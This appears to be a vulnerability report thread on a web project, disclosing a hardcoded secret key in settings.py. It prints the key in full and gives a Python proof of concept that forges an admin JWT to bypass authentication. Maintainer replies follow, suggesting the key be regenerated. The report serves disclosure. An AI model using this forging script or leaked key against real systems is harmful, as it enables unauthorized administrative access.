[Vulnerability] Hardcoded JWT Secret Key in settings.py Leads to Authentication Bypass

[Tritium0041]

Vulnerable File

WebsiteGuide/settings.py (Line 23)

SECRET_KEY = 'm0r4*w5&)vm9b$rj4r-*-+b+!k^f^c=-vt^)+6m_-^qrg871^x'

Vulnerability Type

Hardcoded Cryptographic Key

Impact

Attackers can:

Forge JWT tokens with arbitrary user privileges (e.g., is_superuser=True).
Bypass authentication to access restricted endpoints or administrative functionality.
Impersonate users (e.g., escalate privileges to admin).

Proof of Concept (POC)

import jwt
import time

# Hardcoded secret key extracted from settings.py
secret = "m0r4*w5&)vm9b$rj4r-*-+b+!k^f^c=-vt^)+6m_-^qrg871^x"

# Malicious payload with elevated privileges
payload = {
    "user_id": 1,
    "username": "admin",
    "exp": time.time() + 14400,  # Token valid for 4 hours
    "email": "null",
    "is_superuser": True  # Privilege escalation
}

# Generate forged JWT token
forged_token = jwt.encode(payload, secret, algorithm='HS256')
print(f"Forged JWT Token: {forged_token}")

visit api with the generated token:

This is considered as a proof of authentication bypass.

[mizhexiaoxiao]

It is recommended to regenerate the key and not disclose it

[Tritium0041]

So why don't generate it randomly at the start of the webserver